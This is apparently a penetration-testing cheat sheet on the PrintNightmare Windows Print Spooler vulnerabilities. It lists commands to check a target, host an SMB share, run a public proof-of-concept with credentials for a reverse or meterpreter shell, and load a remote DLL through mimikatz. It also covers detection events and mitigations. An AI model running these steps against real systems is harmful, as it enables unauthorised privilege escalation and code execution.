1.7 KiB
1.7 KiB
Print Nightmare
- Privilege Escalation using Print Spooler Service
- Located at
C:\Windows\System32\spoolsv.exe
- Enabled by default
- CVE-2021-1675 (locally exploitable) and CVE-2021-34527 (RCE) are both related to the print spooler
- RCE connection is done via DCE/RPC. Use of
RpcAddPrinterDriver
orRpcAddPrinterDriverEx
Usage
- Prepare reverse shell
- Check if target would be vulnerable
rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR'
- Execute smb server
smbserver.py share . -smb2support
- Execute PoC with credentials to elevate
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
- Use the meterpreter session
Mimikatz
- Printnightmare modules of mimikatz
misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll
IOCs
-
pcAddPrinterDriverEx()
is called -
Sygnia explains them
-
Logs are
Microsoft-Windows-PrintService/Admin
andMicrosoft-Windows-PrintService/Operational
-
Event Ids
316, 808, 811, 31017, 7031
Mitigation
- link
- Stop and disable
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
- Disable group policy
Computer Configuration/Administrative Templates/Printers